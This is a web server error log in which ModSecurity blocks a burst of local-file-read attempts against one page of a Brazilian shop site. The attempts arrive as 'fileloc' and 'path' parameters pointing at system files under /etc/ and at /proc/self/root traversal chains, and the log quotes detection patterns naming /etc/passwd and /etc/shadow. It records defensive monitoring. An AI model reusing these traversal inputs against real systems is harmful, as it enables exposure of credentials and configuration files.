[Fri Mar 20 06:54:13.430377 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.54:42654] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRda6ubjKNq_cu4bFbQAAA0c"]
[Fri Mar 20 06:54:13.604021 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.32:42656] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRda6ubjKNq_cu4bFbgAAA1g"]
[Fri Mar 20 06:54:13.884120 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.29:42662] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZReoXxyEfFpUF8f9z_AAAAUs"]
[Fri Mar 20 06:54:14.260566 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.17:42674] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRjJ3M9BSuKP7CAYLNAAAAIc"]
[Fri Mar 20 06:54:14.295410 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.80:42678] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRgF0L0L-SsrnPo5aeAAAAtQ"]
[Fri Mar 20 06:54:15.086283 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.41:42686] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZR_qxLDW4GITHUkTXIwAAAQg"]
[Fri Mar 20 06:54:15.551474 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.116:42700] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZR_XLqtnMIWvjpaKMkQAAAoQ"]
[Fri Mar 20 06:54:15.566663 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.87:42702] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRxCii7xarUs8iHZZ2gAAAhQ"]
[Fri Mar 20 06:54:15.619565 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.106:42704] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRwF0L0L-SsrnPo5aeQAAAsg"]
[Fri Mar 20 06:54:16.148104 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.65:42708] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSPqxLDW4GITHUkTXJAAAARY"]
[Fri Mar 20 06:54:16.399696 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.56:42714] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSPXLqtnMIWvjpaKMkgAAAoM"]
[Fri Mar 20 06:54:16.687659 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.27:42720] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSOoXxyEfFpUF8f9z_gAAAU0"]
[Fri Mar 20 06:54:17.419389 2026] [:error] [pid 31215:tid 140411565680384] [client 57.141.18.102:42730] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSQF0L0L-SsrnPo5aegAAAtU"]
[Fri Mar 20 06:54:17.435531 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.99:42732] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSTJ3M9BSuKP7CAYLOAAAAI0"]
[Fri Mar 20 06:54:17.927619 2026] [:error] [pid 21219:tid 140411699963648] [client 57.141.18.113:42744] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSfXLqtnMIWvjpaKMkwAAAoU"]
[Fri Mar 20 06:54:18.290374 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.17:42746] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZShCii7xarUs8iHZZ2wAAAhI"]
[Fri Mar 20 06:54:18.397449 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.94:42748] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSuoXxyEfFpUF8f9z_wAAAVc"]
[Fri Mar 20 06:54:18.732948 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.81:42758] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZSl1pVZ5mVmJwsFMhoQAAAE0"]
[Fri Mar 20 06:54:19.144547 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.57:42766] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZS_qxLDW4GITHUkTXJgAAAQo"]
[Fri Mar 20 06:54:19.372209 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.72:42768] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZS11pVZ5mVmJwsFMhogAAAEs"]
[Fri Mar 20 06:54:19.795882 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.37:42782] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZS_XLqtnMIWvjpaKMlgAAAos"]
[Fri Mar 20 06:54:20.438898 2026] [:error] [pid 11642:tid 140411708356352] [client 57.141.18.57:42804] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZTLninkcc-iUj5ApQuQAAA4Q"]
[Fri Mar 20 06:54:20.836697 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.85:42820] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZTPqxLDW4GITHUkTXJwAAARA"]
[Fri Mar 20 06:54:21.346550 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.4:42836] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZTRCii7xarUs8iHZZ3QAAAg0"]
[Fri Mar 20 06:54:21.850827 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.95:42800] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZTda6ubjKNq_cu4bFcQAAA1M"]
[Fri Mar 20 06:54:22.203045 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.88:42854] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZThCii7xarUs8iHZZ3gAAAhg"]
[Fri Mar 20 06:54:22.793186 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.21:42864] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZTuoXxyEfFpUF8f90AQAAAU8"]
[Fri Mar 20 06:54:45.705263 2026] [mime_magic:error] [pid 10189:tid 140411540502272] (70014)End of file found: [client 74.7.243.128:37352] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root
[Fri Mar 20 06:58:52.423919 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:41772] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/sbin
[Fri Mar 20 06:59:54.633874 2026] [mime_magic:error] [pid 11167:tid 140411632822016] (70014)End of file found: [client 57.141.18.19:53426] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:00:06.388219 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 57.141.18.59:53734] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
